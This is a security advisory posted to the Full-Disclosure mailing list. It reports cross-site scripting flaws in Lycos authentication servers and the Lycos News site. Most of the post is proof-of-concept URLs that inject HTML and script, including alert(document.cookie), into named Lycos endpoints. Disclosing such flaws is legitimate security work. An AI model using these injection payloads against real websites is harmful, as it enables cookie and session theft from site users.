Lycos Authenticating Systems and Lycos News server Vulnerabilities

["Lorenzo Hernandez Garcia-Hierro" <novappc () novappc com>]

---------------
Systems affected: Lycos authenticating servers ,Login forms, Lycos News Site
Risk: 7
Type of errors: Input Validation Flaw
---------------
I encountered  security holes in the Lycos Authentication servers . These
servers are affected by multiple Cross Site Scripting
attacks .The hole is in the form that the login cgi program makes the final
lofin form , injecting a final tag like "> in the m_CBURL
variable you can inject html and script in the login form. In addition i
encountered security holes in the Lycos News server related to XSS attacks.
-------------
EXPLOITS / PROOFS OF CONCEPT
-------------
http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL=";>[HERE COMES YOUR XSS
ATTACK CODE]

http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417";>
[XSS ATTACK CODE]

------------
SAMPLES
------------
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417";>
<H1>xss in Lycos WebSites</h1>
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417";>
<script>alert(document.cookie);</script>
http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417";>
<iframe></iframe>
http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL=";><h1>XSS in Lycos
Authenticating Servers</h1><a href="
http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL=";><script>alert(document.
cookie);</script>

------------------------------------------------------
Lorenzo Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--Nova Projects Professional Coding--
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1  4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
www.novappc.com
security.novappc.com
www.lorenzohgh.com
______________________


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html